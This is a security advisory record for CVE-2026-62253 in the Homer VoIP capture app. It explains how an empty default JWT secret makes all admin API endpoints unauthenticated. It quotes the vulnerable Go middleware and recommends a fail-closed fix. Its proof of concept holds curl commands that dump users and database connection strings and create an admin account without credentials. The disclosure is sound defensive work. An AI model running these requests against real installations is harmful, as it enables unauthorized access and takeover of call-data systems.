{"id":"GHSA-rqcc-94gv-wjm9","summary":"Homer: Complete Authentication Bypass When coordinator.jwt.secret Is Empty (Default)","details":"### Summary\nBoth JWT middleware functions (`JWTMiddleware` and `JWTMiddlewareV4`) immediately return `next(c)` when `jwtSecret == \"\"`. The JWT secret defaults to an empty string. On a default installation, all protected API endpoints under `/api/v1`, `/api/v3`, and `/api/v4` are completely unauthenticated.\n\n### Details\n**`coordinator/handlers/auth.go` lines 298-304:**\n```go\nfunc (h *Auth) JWTMiddleware() echo.MiddlewareFunc {\n    return func(next echo.HandlerFunc) echo.HandlerFunc {\n        return func(c echo.Context) error {\n            if h.jwtSecret == \"\" {\n                return next(c)  // bypass — no validation performed\n            }\n```\n\n**`coordinator/handlers/auth_v4_helpers.go` lines 177-182:**\n```go\nfunc (h *Auth) JWTMiddlewareV4() echo.MiddlewareFunc {\n    return func(next echo.HandlerFunc) echo.HandlerFunc {\n        return func(c echo.Context) error {\n            if h.jwtSecret == \"\" {\n                return next(c)  // same bypass\n```\n\n**`coordinator/coordinator.go` lines 315-317:**\n```go\nif c.config.JWT.Secret != \"\" {\n    protected.Use(authHandler.JWTMiddleware())  // middleware not even registered when secret is empty\n}\n```\n\n**`config/config.go` line 845:** `Secret` field struct tag has `default:\"\"`.\nThe example config ships a placeholder value, but the Go struct default (used when no config is provided) is empty.\n\n### PoC\n```bash\n# On a default Homer installation (no JWT secret configured), all protected routes are open:\ncurl http://\u003chomer-host\u003e/api/v3/users\n# Returns full user list with no credentials\n\ncurl http://\u003chomer-host\u003e/api/v3/databases\n# Returns all database connection strings\n\ncurl -X POST http://\u003chomer-host\u003e/api/v3/users \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"username\":\"attacker\",\"password\":\"pw\",\"partid\":10,\"usergroup\":\"admin\"}'\n# Creates a new admin user with no credentials\n```\n\n### Impact\nMissing Authentication for Critical Function (CWE-306). On a default Homer installation with no JWT secret configured, every admin API endpoint is completely unauthenticated. Attackers can read/write all configuration, users, database connections, and stored VoIP call data.\n\n### Fix\nFail closed: if `JWT.Secret` is empty at startup, abort with a fatal error requiring the operator to set a strong secret. Remove the empty-string shortcircuit from both middleware functions:\n```go\nif h.jwtSecret == \"\" {\n    log.Fatal(\"coordinator.jwt.secret must be set to a non-empty value\")\n}\n```\n\nIf possible, please apply for a CVE number when posting.","aliases":["CVE-2026-62253"],"modified":"2026-10-07T16:15:04.565091043Z","published":"2026-10-07T16:11:58Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-10-07T16:11:58Z","nvd_published_at":null,"cwe_ids":["CWE-306"],"severity":"CRITICAL"},"references":[{"type":"WEB","url":"https://github.com/sipcapture/homer/security/advisories/GHSA-rqcc-94gv-wjm9"},{"type":"WEB","url":"https://github.com/sipcapture/homer/pull/839"},{"type":"WEB","url":"https://github.com/sipcapture/homer/commit/5e90809657c9df321db191a69c6050f873f5646b"},{"type":"PACKAGE","url":"https://github.com/sipcapture/homer"},{"type":"WEB","url":"https://github.com/sipcapture/homer/releases/tag/11.0.283"}],"affected":[{"package":{"name":"github.com/sipcapture/homer-app","ecosystem":"Go","purl":"pkg:golang/github.com/sipcapture/homer-app"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.0.0-20260625093330-5e90809657c9"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-rqcc-94gv-wjm9/GHSA-rqcc-94gv-wjm9.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}